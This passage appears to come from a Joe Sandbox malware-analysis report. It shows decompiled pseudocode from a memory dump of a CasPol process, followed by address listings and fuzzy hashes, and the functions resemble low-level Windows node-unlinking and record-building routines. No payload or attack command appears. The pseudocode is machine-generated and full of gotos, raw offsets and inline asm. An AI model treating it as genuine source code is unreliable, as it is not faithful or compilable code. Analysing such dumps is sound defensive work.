                                                                																}
                                                                															}
                                                                															L21:
                                                                															_t457 =  *(_t426 + 4);
                                                                															if(_t457 != 0) {
                                                                																if(_t307 != 0) {
                                                                																	_t457 = _t457 ^ _t426;
                                                                																}
                                                                																if(( *(_t457 + 8) & 0x00000001) == 0) {
                                                                																	goto L22;
                                                                																} else {
                                                                																	goto L56;
                                                                																}
                                                                															}
                                                                															L22:
                                                                															_t308 =  *(_t423 + 8);
                                                                															if((_t308 & 0x00000001) == 0) {
                                                                																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                                                																_t306 =  *(_t395 + 4);
                                                                																_t431 =  *(_t423 + 8) & 0xfffffffc;
                                                                																_t397 = _t306 & 0x00000001;
                                                                																if(_t397 != 0) {
                                                                																	if(_t431 == 0) {
                                                                																		goto L110;
                                                                																	}
                                                                																	_t423 = _t423 ^ _t431;
                                                                																	L111:
                                                                																	if(_t423 == 0) {
                                                                																		goto L24;
                                                                																	}
                                                                																	_t432 =  *(_t423 + 4);
                                                                																	if(_t397 != 0) {
                                                                																		if(_t432 != 0) {
                                                                																			_t432 = _t432 ^ _t423;
                                                                																		}
                                                                																	}
                                                                																	_v16 = 0 | _t432 == _t446;
                                                                																	_t395 = _a4;
                                                                																	goto L17;
                                                                																}
                                                                																L110:
                                                                																_t423 = _t431;
                                                                																goto L111;
                                                                															} else {
                                                                																_t306 = _t308 & 0x000000fe;
                                                                																 *(_t423 + 8) = _t306;
                                                                																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                                                																goto L24;
                                                                															}
                                                                														}
                                                                														L18:
                                                                														_t426 = _t452;
                                                                														goto L19;
                                                                													}
                                                                												}
                                                                												L13:
                                                                												_t306 = _t426;
                                                                												goto L14;
                                                                											}
                                                                										}
                                                                									}
                                                                									L41:
                                                                									_t366 = _v12;
                                                                									_v20 = _t452;
                                                                									goto L42;
                                                                								}
                                                                								L37:
                                                                								_t483 = _v24;
                                                                								goto L38;
                                                                							}
                                                                						}
                                                                					}
                                                                					L28:
                                                                					_t428 = _t452;
                                                                					goto L29;
                                                                				}
                                                                				_t385 = _v5;
                                                                				_t422 =  *(_t444 + 8) & 0xfffffffc;
                                                                				if(_t385 != 0) {
                                                                					if(_t422 != 0) {
                                                                						_t422 = _t422 ^ _t444;
                                                                					}
                                                                				}
                                                                				_v12 = _t444;
                                                                				if(_t422 == 0) {
                                                                					if(_t426 != 0) {
                                                                						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
                                                                					}
                                                                					_t425 = _a4;
                                                                					if( *_t425 != _t444) {
                                                                						goto L174;
                                                                					} else {
                                                                						_t425[4] = _t426;
                                                                						_t306 = _t425[4] & 0x00000001;
                                                                						if(_t306 != 0) {
                                                                							_t425[4] = _t425[4] | 0x00000001;
                                                                						}
                                                                						 *_t425 = _t426;
                                                                						goto L24;
                                                                					}
                                                                				} else {
                                                                					_t452 =  *(_t422 + 4);
                                                                					if(_t385 != 0) {
                                                                						if(_t452 != 0) {
                                                                							_t452 = _t452 ^ _t422;
                                                                						}
                                                                					}
                                                                					if(_t452 == _t444) {
                                                                						_v16 = 1;
                                                                						L11:
                                                                						_t373 =  *(_t444 + 8);
                                                                						goto L12;
                                                                					} else {
                                                                						_t387 =  *_t422;
                                                                						if(_v5 != 0) {
                                                                							if(_t387 != 0) {
                                                                								_t387 = _t387 ^ _t422;
                                                                							}
                                                                						}
                                                                						if(_t387 != _t444) {
                                                                							goto L174;
                                                                						} else {
                                                                							_t488 = _a4;
                                                                							_v16 = _v16 & 0x00000000;
                                                                							_t388 =  *(_t488 + 4);
                                                                							_v24 = _t388;
                                                                							if((_t388 & 0xfffffffe) == _t444) {
                                                                								if(_t426 != 0) {
                                                                									 *(_t488 + 4) = _t426;
                                                                									if((_v24 & 0x00000001) != 0) {
                                                                										_t390 = _t426;
                                                                										L228:
                                                                										 *(_t488 + 4) = _t390 | 0x00000001;
                                                                									}
                                                                									goto L11;
                                                                								}
                                                                								 *(_t488 + 4) = _t422;
                                                                								if((_v24 & 0x00000001) == 0) {
                                                                									goto L11;
                                                                								} else {
                                                                									_t390 = _t422;
                                                                									goto L228;
                                                                								}
                                                                							}
                                                                							goto L11;
                                                                						}
                                                                					}
                                                                				}
                                                                			}
                                                                0x0162ff3c
                                                                0x0162ff3c
                                                                0x0162ff3e
                                                                0x00000000
                                                                0x0162ff3e
                                                                0x0162ff2e
                                                                0x0162ff1c
                                                                0x0162fef3
                                                                0x0162fee3
                                                                0x0162f9f9
                                                                0x0162f9f9
                                                                0x0162f9fb
                                                                0x0162f9ff
                                                                0x0162fbd5
                                                                0x01685fb1
                                                                0x01685fb1
                                                                0x0162fbdf
                                                                0x00000000
                                                                0x0162fbe5
                                                                0x0162fbe5
                                                                0x0162fbe8
                                                                0x0162fbed
                                                                0x01685fdf
                                                                0x0162fc01
                                                                0x0162fc01
                                                                0x0162fc04
                                                                0x0162fc09
                                                                0x01685fee
                                                                0x01685ff4
                                                                0x01685ff4
                                                                0x01685fee
                                                                0x0162fc0f
                                                                0x0162fc13
                                                                0x0162fc1d
                                                                0x0162fc20
                                                                0x0162fc23
                                                                0x0162fc26
                                                                0x0162fc2b
                                                                0x01685ffd
                                                                0x01686003
                                                                0x01686003
                                                                0x01685ffd
                                                                0x0162fc33
                                                                0x00000000
                                                                0x0162fc39
                                                                0x0162fc3b
                                                                0x0162fc3e
                                                                0x0162fc41
                                                                0x0162fc46
                                                                0x0168600c
                                                                0x01686012
                                                                0x01686012
                                                                0x0168600c
                                                                0x0162fc4e
                                                                0x00000000
                                                                0x0162fc54
                                                                0x0162fc54
                                                                0x0162fc59
                                                                0x0168601b
                                                                0x01686021
                                                                0x01686021
                                                                0x0168601b
                                                                0x0162fc61
                                                                0x00000000
                                                                0x0162fc67
                                                                0x0162fc6a
                                                                0x0162fc6f
                                                                0x0168602a
                                                                0x01686030
                                                                0x01686030
                                                                0x0168602a
                                                                0x0162fc77
                                                                0x00000000
                                                                0x0162fc7d
                                                                0x0162fc7f
                                                                0x0162fc81
                                                                0x0162fc85
                                                                0x0162fc87
                                                                0x0162fc87
                                                                0x0162fc8c
                                                                0x0162fc8f
                                                                0x0162fc94
                                                                0x01686039
                                                                0x0162fc9c
                                                                0x0162fca4
                                                                0x0162fcaa
                                                                0x0162fcaf
                                                                0x01686046
                                                                0x0162fcbd
                                                                0x0162fcbf
                                                                0x0168606d
                                                                0x01686073
                                                                0x01686073
                                                                0x0168606d
                                                                0x0162fcc8
                                                                0x0162fccd
                                                                0x0162fccf
                                                                0x0162fcd3
                                                                0x0162fcd5
                                                                0x0162fcd5
                                                                0x0162fcde
                                                                0x0162fce1
                                                                0x0162fce3
                                                                0x0162fce3
                                                                0x0162fce8
                                                                0x0162fcf0
                                                                0x0162fcf2
                                                                0x0162fcf5
                                                                0x0162fcf7
                                                                0x0162fcff
                                                                0x0162fd02
                                                                0x0162fd06
                                                                0x0162fd11
                                                                0x0162fd14
                                                                0x0162fd17
                                                                0x0168607c
                                                                0x01686082
                                                                0x01686082
                                                                0x0168607c
                                                                0x0162fd1f
                                                                0x00000000
                                                                0x0162fd25
                                                                0x0162fd28
                                                                0x0162fd2d
                                                                0x0168608b
                                                                0x01686091
                                                                0x01686091
                                                                0x0168608b
                                                                0x0162fd35
                                                                0x00000000
                                                                0x0162fd3b
                                                                0x0162fd3e
                                                                0x0162fd43
                                                                0x0168609a
                                                                0x01630016
                                                                0x01630018
                                                                0x00000000
                                                                0x0163001a
                                                                0x0163001a
                                                                0x0162fd82
                                                                0x0162fd84
                                                                0x016860d9
                                                                0x016860df
                                                                0x016860df
                                                                0x016860d9
                                                                0x0162fd8d
                                                                0x0162fd95
                                                                0x0162fd98
                                                                0x0162fd9d
                                                                0x016860e8
                                                                0x00000000
                                                                0x00000000
                                                                0x016860ee
                                                                0x00000000
                                                                0x0162fda3
                                                                0x0162fda3
                                                                0x0162fda5
                                                                0x0162fe8b
                                                                0x0162fe90
                                                                0x0162fe95
                                                                0x016860f7
                                                                0x016860fd
                                                                0x016860fd
                                                                0x016860f7
                                                                0x0162fe9d
                                                                0x00000000
                                                                0x0162fea3
                                                                0x0162fea5
                                                                0x01686106
                                                                0x0162feab
                                                                0x0162feab
                                                                0x0162feab
                                                                0x0162feb2
                                                                0x0162feb5
                                                                0x00000000
                                                                0x0162feb5
                                                                0x0162fe9d
                                                                0x0162fdab
                                                                0x0162fdad
                                                                0x0168610f
                                                                0x01686115
                                                                0x01686115
                                                                0x0168610f
                                                                0x0162fdb6
                                                                0x0162fdbb
                                                                0x0168611e
                                                                0x01686120
                                                                0x0162fdc1
                                                                0x0162fdc1
                                                                0x0162fdc5
                                                                0x0162fdc5
                                                                0x0162fdc7
                                                                0x0162fdcc
                                                                0x0162fdce
                                                                0x0162fdce
                                                                0x0162fdd6
                                                                0x0162fdd8
                                                                0x00000000
                                                                0x0162fdd8
                                                                0x0162fd9d
                                                                0x01630018
                                                                0x016860a0
                                                                0x016860a0
                                                                0x0162fd4b
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fd51
                                                                0x0162fd56
                                                                0x016860a9
                                                                0x016860af
                                                                0x016860af
                                                                0x016860a9
                                                                0x0162fd5e
                                                                0x0162febf
                                                                0x016860b8
                                                                0x0162fec5
                                                                0x0162fec5
                                                                0x0162fec5
                                                                0x0162fec7
                                                                0x00000000
                                                                0x0162fd64
                                                                0x0162fd64
                                                                0x0162fd68
                                                                0x016860c1
                                                                0x016860c7
                                                                0x016860c7
                                                                0x016860c1
                                                                0x0162fd70
                                                                0x00000000
                                                                0x0162fd76
                                                                0x0162fd78
                                                                0x016860d0
                                                                0x0162fd7e
                                                                0x0162fd7e
                                                                0x0162fd7e
                                                                0x0162fd80
                                                                0x00000000
                                                                0x0162fd80
                                                                0x0162fd70
                                                                0x0162fd5e
                                                                0x0162fd35
                                                                0x0162fd1f
                                                                0x0168604c
                                                                0x0168604c
                                                                0x0162fcb7
                                                                0x0162ffc0
                                                                0x0162ffc3
                                                                0x0162ffc6
                                                                0x0162ffcb
                                                                0x01686055
                                                                0x0168605b
                                                                0x0168605b
                                                                0x01686055
                                                                0x0162ffd3
                                                                0x00000000
                                                                0x0162ffd9
                                                                0x0162ffdb
                                                                0x01686064
                                                                0x0162ffe1
                                                                0x0162ffe1
                                                                0x0162ffe1
                                                                0x0162ffe3
                                                                0x0162ffe7
                                                                0x0162ffed
                                                                0x00000000
                                                                0x0162ffed
                                                                0x0162ffd3
                                                                0x00000000
                                                                0x0162fcb7
                                                                0x0168603f
                                                                0x0162fc9a
                                                                0x00000000
                                                                0x0162fc9a
                                                                0x0162fc77
                                                                0x0162fc61
                                                                0x0162fc4e
                                                                0x0162fc33
                                                                0x01685fe5
                                                                0x01685fe5
                                                                0x0162fbf5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fbf5
                                                                0x0162fbdf
                                                                0x0162fa05
                                                                0x0162fa05
                                                                0x0162fa0a
                                                                0x0162fe14
                                                                0x01685fb8
                                                                0x01685fb8
                                                                0x0162fe1e
                                                                0x00000000
                                                                0x0162fe24
                                                                0x00000000
                                                                0x0162fe24
                                                                0x0162fe1e
                                                                0x0162fa10
                                                                0x0162fa10
                                                                0x0162fa15
                                                                0x0162fe29
                                                                0x0162fe2d
                                                                0x0162fe35
                                                                0x0162fe38
                                                                0x0162fe3b
                                                                0x01685fc1
                                                                0x00000000
                                                                0x00000000
                                                                0x01685fc7
                                                                0x0162fe43
                                                                0x0162fe45
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fe4b
                                                                0x0162fe50
                                                                0x01685fd0
                                                                0x01685fd6
                                                                0x01685fd6
                                                                0x01685fd0
                                                                0x0162fe5d
                                                                0x0162fe60
                                                                0x00000000
                                                                0x0162fe60
                                                                0x0162fe41
                                                                0x0162fe41
                                                                0x00000000
                                                                0x0162fa1b
                                                                0x0162fa1b
                                                                0x0162fa1d
                                                                0x0162fa20
                                                                0x00000000
                                                                0x0162fa20
                                                                0x0162fa15
                                                                0x0162f9ed
                                                                0x0162f9ed
                                                                0x00000000
                                                                0x0162f9ed
                                                                0x0162f9cd
                                                                0x0162f9ba
                                                                0x0162f9ba
                                                                0x00000000
                                                                0x0162f9ba
                                                                0x0162fba8
                                                                0x0162fb65
                                                                0x0162fb1d
                                                                0x0162fb23
                                                                0x0162fb26
                                                                0x00000000
                                                                0x0162fb26
                                                                0x0162faf3
                                                                0x0162faf3
                                                                0x00000000
                                                                0x0162faf3
                                                                0x0162fab4
                                                                0x0162fa79
                                                                0x0162fa56
                                                                0x0162fa56
                                                                0x00000000
                                                                0x0162fa56
                                                                0x0162f94d
                                                                0x0162f950
                                                                0x0162f955
                                                                0x01685e79
                                                                0x01685e7f
                                                                0x01685e7f
                                                                0x01685e79
                                                                0x0162f95b
                                                                0x0162f960
                                                                0x01685e88
                                                                0x01685e8a
                                                                0x01685e8a
                                                                0x01685e8e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                • Instruction ID: a617948f7882ba45699e7d1095f53b31a0711db4b47a3ce19fb021935ae52a5c
                                                                • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                • Instruction Fuzzy Hash: E462E532E04A769BDB22CE2CCD4066AFBB1AF45754F1986D9DCA59B342D371D842CF80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 88%
                                                                			E016F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				signed int _t296;
                                                                				signed char _t298;
                                                                				signed int _t301;
                                                                				signed int _t306;
                                                                				signed int _t310;
                                                                				signed char _t311;
                                                                				intOrPtr _t312;
                                                                				signed int _t313;
                                                                				void* _t327;
                                                                				signed int _t328;
                                                                				intOrPtr _t329;
                                                                				intOrPtr _t333;
                                                                				signed char _t334;
                                                                				signed int _t336;
                                                                				void* _t339;
                                                                				signed int _t340;
                                                                				signed int _t356;
                                                                				signed int _t362;
                                                                				short _t367;
                                                                				short _t368;
                                                                				short _t373;
                                                                				signed int _t380;
                                                                				void* _t382;
                                                                				short _t385;
                                                                				signed short _t392;
                                                                				signed char _t393;
                                                                				signed int _t395;
                                                                				signed char _t397;
                                                                				signed int _t398;
                                                                				signed short _t402;
                                                                				void* _t406;
                                                                				signed int _t412;
                                                                				signed char _t414;
                                                                				signed short _t416;
                                                                				signed int _t421;
                                                                				signed char _t427;
                                                                				intOrPtr _t434;
                                                                				signed char _t435;
                                                                				signed int _t436;
                                                                				signed int _t442;
                                                                				signed int _t446;
                                                                				signed int _t447;
                                                                				signed int _t451;
                                                                				signed int _t453;
                                                                				signed int _t454;
                                                                				signed int _t455;
                                                                				intOrPtr _t456;
                                                                				intOrPtr* _t457;
                                                                				short _t458;
                                                                				signed short _t462;
                                                                				signed int _t469;
                                                                				intOrPtr* _t474;
                                                                				signed int _t475;
                                                                				signed int _t479;
                                                                				signed int _t480;
                                                                				signed int _t481;
                                                                				short _t485;
                                                                				signed int _t491;
                                                                				signed int* _t494;
                                                                				signed int _t498;
                                                                				signed int _t505;
                                                                				intOrPtr _t506;
                                                                				signed short _t508;
                                                                				signed int _t511;
                                                                				void* _t517;
                                                                				signed int _t519;
                                                                				signed int _t522;
                                                                				void* _t523;
                                                                				signed int _t524;
                                                                				void* _t528;
                                                                				signed int _t529;
                                                                
                                                                				_push(0xd4);
                                                                				_push(0x1701178);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				_t494 = __edx;
                                                                				 *(_t528 - 0xcc) = __edx;
                                                                				_t511 = __ecx;
                                                                				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                				 *(_t528 - 0xbc) = __ecx;
                                                                				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                				_t427 = 0;
                                                                				 *(_t528 - 0x74) = 0;
                                                                				 *(_t528 - 0x9c) = 0;
                                                                				 *(_t528 - 0x84) = 0;
                                                                				 *(_t528 - 0xac) = 0;
                                                                				 *(_t528 - 0x88) = 0;
                                                                				 *(_t528 - 0xa8) = 0;
                                                                				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                				if( *(_t528 + 0x1c) <= 0x80) {
                                                                					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                					if(__eflags != 0) {
                                                                						_t421 = E016F4C56(0, __edx, __ecx, __eflags);
                                                                						__eflags = _t421;
                                                                						if(_t421 != 0) {
                                                                							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                							E0166D000(0x410);
                                                                							 *(_t528 - 0x18) = _t529;
                                                                							 *(_t528 - 0x9c) = _t529;
                                                                							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                							E016F5542(_t528 - 0x9c, _t528 - 0x84);
                                                                						}
                                                                					}
                                                                					_t435 = _t427;
                                                                					 *(_t528 - 0xd0) = _t435;
                                                                					_t474 = _t511 + 0x65;
                                                                					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                					_t511 = 0x18;
                                                                					while(1) {
                                                                						 *(_t528 - 0xa0) = _t427;
                                                                						 *(_t528 - 0xbc) = _t427;
                                                                						 *(_t528 - 0x80) = _t427;
                                                                						 *(_t528 - 0x78) = 0x50;
                                                                						 *(_t528 - 0x79) = _t427;
                                                                						 *(_t528 - 0x7a) = _t427;
                                                                						 *(_t528 - 0x8c) = _t427;
                                                                						 *(_t528 - 0x98) = _t427;
                                                                						 *(_t528 - 0x90) = _t427;
                                                                						 *(_t528 - 0xb0) = _t427;
                                                                						 *(_t528 - 0xb8) = _t427;
                                                                						_t296 = 1 << _t435;
                                                                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                						__eflags = _t436 & _t296;
                                                                						if((_t436 & _t296) != 0) {
                                                                							goto L92;
                                                                						}
                                                                						__eflags =  *((char*)(_t474 - 1));
                                                                						if( *((char*)(_t474 - 1)) == 0) {
                                                                							goto L92;
                                                                						}
                                                                						_t301 =  *_t474;
                                                                						__eflags = _t494[1] - _t301;
                                                                						if(_t494[1] <= _t301) {
                                                                							L10:
                                                                							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                								L12:
                                                                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                									goto L92;
                                                                								}
                                                                								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                									goto L92;
                                                                								}
                                                                								__eflags = _t442 -  *(_t474 - 0x11);
                                                                								if(_t442 !=  *(_t474 - 0x11)) {
                                                                									goto L92;
                                                                								}
                                                                								L15:
                                                                								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                								 *(_t528 - 0xc0) = _t306;
                                                                								 *(_t528 - 0xa4) = _t306;
                                                                								__eflags =  *0x17160e8;
                                                                								if( *0x17160e8 != 0) {
                                                                									__eflags = _t306 - 0x40;
                                                                									if(_t306 < 0x40) {
                                                                										L20:
                                                                										asm("lock inc dword [eax]");
                                                                										_t310 =  *0x17160e8; // 0x0
                                                                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                										__eflags = _t311 & 0x00000001;
                                                                										if((_t311 & 0x00000001) == 0) {
                                                                											 *(_t528 - 0xa0) = _t311;
                                                                											_t475 = _t427;
                                                                											 *(_t528 - 0x74) = _t427;
                                                                											__eflags = _t475;
                                                                											if(_t475 != 0) {
                                                                												L91:
                                                                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                												goto L92;
                                                                											}
                                                                											asm("sbb edi, edi");
                                                                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                											_t511 = _t498;
                                                                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                											__eflags =  *(_t312 - 5) & 1;
                                                                											if(( *(_t312 - 5) & 1) != 0) {
                                                                												_push(_t528 - 0x98);
                                                                												_push(0x4c);
                                                                												_push(_t528 - 0x70);
                                                                												_push(1);
                                                                												_push(0xfffffffa);
                                                                												_t412 = E01669710();
                                                                												_t475 = _t427;
                                                                												__eflags = _t412;
                                                                												if(_t412 >= 0) {
                                                                													_t414 =  *(_t528 - 0x98) - 8;
                                                                													 *(_t528 - 0x98) = _t414;
                                                                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                													 *(_t528 - 0x8c) = _t416;
                                                                													 *(_t528 - 0x79) = 1;
                                                                													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                													__eflags = _t511;
                                                                												}
                                                                											}
                                                                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                											__eflags = _t446 & 0x00000004;
                                                                											if((_t446 & 0x00000004) != 0) {
                                                                												__eflags =  *(_t528 - 0x9c);
                                                                												if( *(_t528 - 0x9c) != 0) {
                                                                													 *(_t528 - 0x7a) = 1;
                                                                													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                													__eflags = _t511;
                                                                												}
                                                                											}
                                                                											_t313 = 2;
                                                                											_t447 = _t446 & _t313;
                                                                											__eflags = _t447;
                                                                											 *(_t528 - 0xd4) = _t447;
                                                                											if(_t447 != 0) {
                                                                												_t406 = 0x10;
                                                                												_t511 = _t511 + _t406;
                                                                												__eflags = _t511;
                                                                											}
                                                                											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                											 *(_t528 - 0x88) = _t427;
                                                                											__eflags =  *(_t528 + 0x1c);
                                                                											if( *(_t528 + 0x1c) <= 0) {
                                                                												L45:
                                                                												__eflags =  *(_t528 - 0xb0);
                                                                												if( *(_t528 - 0xb0) != 0) {
                                                                													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                													__eflags = _t511;
                                                                												}
                                                                												__eflags = _t475;
                                                                												if(_t475 != 0) {
                                                                													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                													goto L100;
                                                                												} else {
                                                                													_t494[3] = _t511;
                                                                													_t451 =  *(_t528 - 0xa0);
                                                                													_t427 = E01666DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                													 *(_t528 - 0x88) = _t427;
                                                                													__eflags = _t427;
                                                                													if(_t427 == 0) {
                                                                														__eflags = _t511 - 0xfff8;
                                                                														if(_t511 <= 0xfff8) {
                                                                															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                															asm("sbb ecx, ecx");
                                                                															__eflags = (_t451 & 0x000000e2) + 8;
                                                                														}
                                                                														asm("lock dec dword [eax+edx*8+0x4]");
                                                                														L100:
                                                                														goto L101;
                                                                													}
                                                                													_t453 =  *(_t528 - 0xa0);
                                                                													 *_t494 = _t453;
                                                                													_t494[1] = _t427;
                                                                													_t494[2] =  *(_t528 - 0xbc);
                                                                													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													__eflags =  *(_t528 + 0x14);
                                                                													if( *(_t528 + 0x14) == 0) {
                                                                														__eflags =  *[fs:0x18] + 0xf50;
                                                                													}
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													asm("movsd");
                                                                													__eflags =  *(_t528 + 0x18);
                                                                													if( *(_t528 + 0x18) == 0) {
                                                                														_t454 =  *(_t528 - 0x80);
                                                                														_t479 =  *(_t528 - 0x78);
                                                                														_t327 = 1;
                                                                														__eflags = 1;
                                                                													} else {
                                                                														_t146 = _t427 + 0x50; // 0x50
                                                                														_t454 = _t146;
                                                                														 *(_t528 - 0x80) = _t454;
                                                                														_t382 = 0x18;
                                                                														 *_t454 = _t382;
                                                                														 *((short*)(_t454 + 2)) = 1;
                                                                														_t385 = 0x10;
                                                                														 *((short*)(_t454 + 6)) = _t385;
                                                                														 *(_t454 + 4) = 0;
                                                                														asm("movsd");
                                                                														asm("movsd");
                                                                														asm("movsd");
                                                                														asm("movsd");
                                                                														_t327 = 1;
                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                														_t479 = 0x68;
                                                                														 *(_t528 - 0x78) = _t479;
                                                                													}
                                                                													__eflags =  *(_t528 - 0x79) - _t327;
                                                                													if( *(_t528 - 0x79) == _t327) {
                                                                														_t524 = _t479 + _t427;
                                                                														_t508 =  *(_t528 - 0x8c);
                                                                														 *_t524 = _t508;
                                                                														_t373 = 2;
                                                                														 *((short*)(_t524 + 2)) = _t373;
                                                                														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                														 *((short*)(_t524 + 4)) = 0;
                                                                														_t167 = _t524 + 8; // 0x8
                                                                														E0166F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                														_t529 = _t529 + 0xc;
                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                														 *(_t528 - 0x78) = _t479;
                                                                														_t380 =  *(_t528 - 0x80);
                                                                														__eflags = _t380;
                                                                														if(_t380 != 0) {
                                                                															_t173 = _t380 + 4;
                                                                															 *_t173 =  *(_t380 + 4) | 1;
                                                                															__eflags =  *_t173;
                                                                														}
                                                                														_t454 = _t524;
                                                                														 *(_t528 - 0x80) = _t454;
                                                                														_t327 = 1;
                                                                														__eflags = 1;
                                                                													}
                                                                													__eflags =  *(_t528 - 0xd4);
                                                                													if( *(_t528 - 0xd4) == 0) {
                                                                														_t505 =  *(_t528 - 0x80);
                                                                													} else {
                                                                														_t505 = _t479 + _t427;
                                                                														_t523 = 0x10;
                                                                														 *_t505 = _t523;
                                                                														_t367 = 3;
                                                                														 *((short*)(_t505 + 2)) = _t367;
                                                                														_t368 = 4;
                                                                														 *((short*)(_t505 + 6)) = _t368;
                                                                														 *(_t505 + 4) = 0;
                                                                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                														_t327 = 1;
                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                														_t479 = _t479 + _t523;
                                                                														 *(_t528 - 0x78) = _t479;
                                                                														__eflags = _t454;
                                                                														if(_t454 != 0) {
                                                                															_t186 = _t454 + 4;
                                                                															 *_t186 =  *(_t454 + 4) | 1;
                                                                															__eflags =  *_t186;
                                                                														}
                                                                														 *(_t528 - 0x80) = _t505;
                                                                													}
                                                                													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                													if( *(_t528 - 0x7a) == _t327) {
                                                                														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                														E0166F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                														_t529 = _t529 + 0xc;
                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                														_t479 =  *(_t528 - 0x78) + _t522;
                                                                														 *(_t528 - 0x78) = _t479;
                                                                														__eflags = _t505;
                                                                														if(_t505 != 0) {
                                                                															_t199 = _t505 + 4;
                                                                															 *_t199 =  *(_t505 + 4) | 1;
                                                                															__eflags =  *_t199;
                                                                														}
                                                                														_t505 =  *(_t528 - 0xd4);
                                                                														 *(_t528 - 0x80) = _t505;
                                                                													}
                                                                													__eflags =  *(_t528 - 0xa8);
                                                                													if( *(_t528 - 0xa8) != 0) {
                                                                														_t356 = _t479 + _t427;
                                                                														 *(_t528 - 0xd4) = _t356;
                                                                														_t462 =  *(_t528 - 0xac);
                                                                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                														_t485 = 0xc;
                                                                														 *((short*)(_t356 + 2)) = _t485;
                                                                														 *(_t356 + 6) = _t462;
                                                                														 *((short*)(_t356 + 4)) = 0;
                                                                														_t211 = _t356 + 8; // 0x9
                                                                														E0166F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                														E0166FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                														_t529 = _t529 + 0x18;
                                                                														_t427 =  *(_t528 - 0x88);
                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                														_t505 =  *(_t528 - 0xd4);
